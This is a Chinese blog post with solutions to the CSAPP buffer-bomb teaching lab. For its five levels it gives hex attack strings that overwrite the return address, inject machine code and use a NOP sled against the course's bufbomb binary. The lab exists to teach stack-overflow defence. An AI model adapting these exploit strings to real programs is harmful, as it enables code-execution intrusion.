计算机系统基础:缓冲区炸弹实验

最新推荐文章于 2024-04-30 17:02:38 发布
最新推荐文章于 2024-04-30 17:02:38 发布
阅读量1.4k 收藏 8
点赞数
分类专栏: ICSlab实验合集 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45664450/article/details/112748325
版权

第一关smoke:

查询到:08048c18 : 即smoke首地址为0x8048c18,根据getbuf的汇编代码,可得buf缓冲区大小有0x28个字节,可得攻击字符串为0x28+4+4=48个字节,且最后四个字节为smoke的地址。攻击字符串为:
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 18 8c 04 08

第二关fizz:

与smoke类似,但fizz函数需要一个参数,值为cookie,
fizz地址为1005b2b7,cookie地址为08048c42,可得攻击字符串:
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
42 8c 04 08
00 00 00 00
b7 b2 05 10

第三关bang:

这一关需要将globalvalue 的值改成我们的cookie,
构造自定义攻击指令bang.s,指令 gcc -m32 -c bang.s
将assembly code写成machine code –>bang.o,
再用objdump -d bang.o 读取machine code。将指令代码抄入攻击文件,
除此之外我们还需要找到input string存放的位置作为第一次ret 指令的目标位置,可得攻击字符串:
a1 08 d1 04 08
a3 00 d1 04 08
68 9d 8c 04 08
c3 00 00 00 00
00 00 00 00 00
00 00 00 00 00
00 00 00 00 00
00 00 00 00 00
00 00 00 00 88
35 68 55

第四关boom:

getbuf() 结束后回到test()原本的位置(即call getbuf后的下一行),
并将cookie作为getbuf()的返回值传给test()。
知道了旧的ebp寄存器和正确的返回地址后构造攻击代码实施攻击。
攻击字符串为:
b8 b7 b2 05 10
bd e0 35 68 55
68 be 8d 04 08
c3 00 00 00 00
00 00 00 00 00
00 00 00 00 00
00 00 00 00 00
00 00 00 00 00
00 00 00 00 88
35 68 55

第五关kaboom

使用./bufbomb的-n参数,bufbomb不会再像从前哪样调用test(),而是调用testn(),testn()又调getbufn()。本级的任务是使getn返回cookie给testn()。听上去似乎与上一级没什么不同,但实际上该级的栈地址是动态的,每次都不一样bufbomb会连续要我们输入5次字符串,每次都调用getbufn(),每次的栈地址都不一样。查看getbufn()汇编代码,可得我们需填充0x4-(-0x208)= 0x20c = 524个字节的字符,再写4个字节覆盖getbufn()的返回地址。
攻击字符串为:

90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90

90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90

90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90

90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90

90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90

90 90 90 90 90 90 90 90 90 b8 
b7 b2 05 10 8d 6c 24 28 68 3a 
8e 04 08 c3 f8 33 68 55

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

今天也要敲代码
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CSAPP 二进制炸弹 binary bomb lab 3 第三关 ——深入理解计算机系统
Eternitykc的博客
11-25 1313
CSAPP bomb lab3 Phase_3 0000000000400f43 <phase_3>: 400f43: 48 83 ec 18 sub $0x18,%rsp 400f47: 48 8d 4c 24 0c lea 0xc(%rsp),%rcx 400f4c: 48 8d 54 24 08 lea 0x8(%rsp),%rdx 400f51: be cf 25 40 00 mov $0x40
缓冲区溢出实验(The Buffer Bomb)解答及实验报告
04-13
CMU的缓冲区溢出实验(The Buffer Bomb) 我的解答及实验报告
计算机系统基础缓冲区溢出攻击实验
04-14
就是计算机系统基础的那个缓冲区溢出实验实验报告很详细。
二进制缓冲区溢出炸弹
学习记录
04-10 2663
把反汇编代码分享给大家参考 链接:https://pan.baidu.com/s/1iZXI4mOkX9bv84ZvMpJplw 提取码:u4dp
计算机系统实验五:缓冲区溢出攻击
Cheney ' blog
01-13 8265
内容: 实验内容: 1 缓冲区溢出攻击实验的内容、原理、方法和基本步骤; 2 过程调用的机器级表示、栈帧组成结构、缓冲区溢出等知识的回顾与应用。 实验目标: 1 加深对函数调用规则、栈结构、缓冲区溢出攻击原理、方法与防范等方面知识的理解和掌 握; 2 从程序员角度认识计算机系统,将程序设计、汇编语言、系统结构、操作系统、编译链接 中的重要概念贯穿起来,对指令在硬件上的执行过程和指令的底层硬件执行机制有深入的理 解;能够以需求分析为基础,对计算机系统模块或单元进行操作。 3 掌握各种开源的编译调试工具。 实验
计算机系统实验:二进制炸弹+缓冲区炸弹 (自我学习笔记)
weixin_52867134的博客
03-25 2221
本来没想写个博客,结果得知还要验收,发现自己全忘了,那就趁着复习的功夫再捋一遍吧>-< 一、使用工具:IDA-pro 简单使用方式: 1、打开IDA,open需要反汇编的exe。 选则win32debugger,process option可以传入命令行参数(该实验中为学号)。 2、F9会运行exe,直到断点停止。F8 step over, F7 step into; F5显示C代码(32bit的IDA有,64位没有) 3、展示出的汇编指令为x86,采用Inter格式 ,noA...
CSAPP实验三:缓冲区溢出炸弹(Buflab)
CNFINITE的博客
08-12 8131
本系列文章为中国科学技术大学计算机专业学科基础课《计算机系统》布置的实验,上课所用教材和内容为黑书CSAPP,当时花费很大精力和弯路,现来总结下各个实验,本文章为第三个实验——缓冲区溢出炸弹(Buflab)。 一、实验名称:buflab 二、实验学时: 3 三、实验内容和目的: 掌握函数调用时的栈帧结构,利用输入缓冲区的溢出漏洞,将攻击代码嵌入当前程序的栈帧中,使得程序执行我们所期望的过程 四、实验原理: 溢出的字符将覆盖栈帧上的数据 特...
计算机系统实验2:炸弹实验bomb
weixin_51295681的博客
04-17 9958
问题描述 炸弹实验 实验目的 本次实验为熟悉汇编程序及其调试方法的实验实验内容包含2个文件bomb(可执行文件)和bomb.c(c源文件)。 实验主题内容为:程序运行在linux环境中。程序运行中有6个关卡(6个phase),每个phase需要用户在终端上输入特定的字符或者数字才能通关,否则会引爆炸弹!那么如何才能知道输入什么内容呢?这需要你使用gdb工具反汇编出汇编代码,结合c语言文件找到每个关卡的入口函数。然后分析汇编代码,找到在每个phase程序段中,引导程序跳转到“explode_bomb”程序
计算机系统实验-缓冲区炸弹
Hopeace的博客
03-16 1282
计算机系统实验-缓冲区炸弹概述Trojan1Trojan2Trojan3Trojan4 概述 攻击指令:0XDDDBBFFF #include <stdio.h> #include <stdlib.h> #include <string.h> #include <ctype.h> int getbuf(void); void test(void); int cookie=0x11223344; unsigned long rand1_h,rand1_l,
计算机系统基础课程实验课bomb--phase_3
weixin_56684908的博客
11-21 489
首先栈指针减去24,应该是为了存储数组所需要,%rcx存储栈指针加12的地址 ,%rdx存储栈指针加8的地址分别作为第四第三参数,并且把0放入了返回值%eax中 然后可以看到输入函数的第二个参数地址为0x4025cf 通过x/s查看内存的值为 即输入的值为两个整数 然后根据sscanf函数的返回值与1比较小于1就爆炸,大于1继续(即有没有按照格式输入) 紧接着跳转到0x400f6a,比较7和(%rsp+8)中值的大小,即输入的第一个值,不小于7就跳转爆炸 接着继续把第一个输入值放入返回值里面 然后就是
计算机系统实验——二进制炸弹(bomb)包括secret_phase
Xiongcanne的博客
05-10 4593
实验题目:本实验设计为一个黑客拆解二进制炸弹的游戏。我们仅给黑客(同学)提供一个二进制可执行文件bomb_64和主函数所在的源程序bomb_64.c,不提供每个关卡的源代码。程序运行中有6个关卡(6个phase),每个关卡需要用户输入正确的字符串或数字才能通关,否则会引爆炸弹(打印出一条错误信息)!要求同学运用GDB调试工具和objdump反汇编工具,通过分析汇编代码,找到在每个phase程序段中,引导程序跳转到“explode_bomb”程序段的地方,并分析其成功跳转的条件,以此为突破口寻找应该在命令行输
Windows版本的二进制炸弹文件
08-26
CSAPP大名鼎鼎了,网上许多人都完成了其独具特色的实验,特别是二进制炸弹缓冲区炸弹等。 二进制炸弹实验,主要锻炼学习者使用反汇编工具对二进制可执行程序调试、分析的能力。学习者首先需要使用调试器调试bomb可执行文件,对其进行反汇编分析,找出炸弹逻辑,并输入正确的密码,以便顺利拆除炸弹。 由于许多学习者对Linux不熟悉、对英文不熟悉,所以存在较大的畏惧心理。据此,我依据CSAPP二进制炸弹的原理,自行设计了一个可在windows下面运行的二进制炸弹,重新设计了关卡,并进行中文提示。这个二进制炸弹,主要面向大量学生的课堂,每个学生拿到的炸弹逻辑是不同的,这样每个学生的答案应该是不一样的。
地理信息系统基础缓冲区分析.pptx
06-09
缓冲区分析;;缓冲区分析基本概念;1.1 缓冲区分析的定义 ;1.2 缓冲区分析的组成要素;缓冲区分析类型;缓冲区分析的类型;缓冲区分析的类型;缓冲区分析的类型 ;;缓冲区分析建立; 矢量缓冲区的建立;; 空间缓冲区建立应...
地理信息系统基础缓冲区分析.ppt
06-09
如果不进行字段设置,那么只有系统默认的字段 【演示】: 演示擦除操作 【演示】: 演示求交,注意选择需要保留的字段 如果第一个数据集为点数集,则新生成的数据集中保留第一个数据集的所有对象;如果第一个数据集...
地理信息系统基础缓冲区分析(超图 实践指导).pptx
06-09
缓冲区分析;如何建立点、面缓冲区;如何建立线缓冲区;建立多重缓冲区;叠加分析;裁剪;求交;擦除;更新;对称差;合并;同一;网络分析;网络分析的基本概念;网络分析基本概念;网络分析流程;第一步:构建网络数据集;第二步:...
《网络安全技术》大作业:缓冲区溢出实验报告
12-27
普通的程序员由于失误导致的缓冲区溢出可能只会导致程序无法运行而不会影响系统,但是如果黑客使用构造好的数据来进行缓冲区溢出攻击则可能获得超级管理员权限,非常危险。 二、实验流程 1. 系统环境 Windows操作...
Linux』 第一章 基本操作指令(上)
m0_54443558的博客
04-28 930
Linux 基本指令
linux-journal日志文件特别大怎么办,journal日志文件学习
你是我的天晴
04-28 246
今天发现磁盘容量不多了,就去清理磁盘,发现这个文件特别大:journal,特此来学习下。
获取Java 虚拟机进程ID(java应用进程Id的方法) Linux & windows
最新发布
weixin_44131922的博客
04-30 367
这个命令会列出所有包含"java"的进程信息。从中你可以找到你的Java应用对应的进程行,第一列就是进程ID(PID)。这个命令会列出所有包含"java"的进程信息。在输出的信息中,你可以找到Java进程及其PID。替换为你的Java主类名或jar文件名的部分匹配字符串,pgrep会直接返回对应的进程ID。如果你需要在Java程序内部获取其自身的进程ID,可以使用。这段代码会打印出当前运行Java程序的进程ID。
计算机系统基础缓冲区溢出攻击实验level 3: rumble
07-15
计算机系统基础缓冲区溢出攻击实验level 3: rumble是一个高级的缓冲区溢出攻击实验,需要一定的计算机系统知识和技术。缓冲区溢出攻击是一种常见的安全漏洞,攻击者通过向程序的输入缓冲区传递超出其容量的数据,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值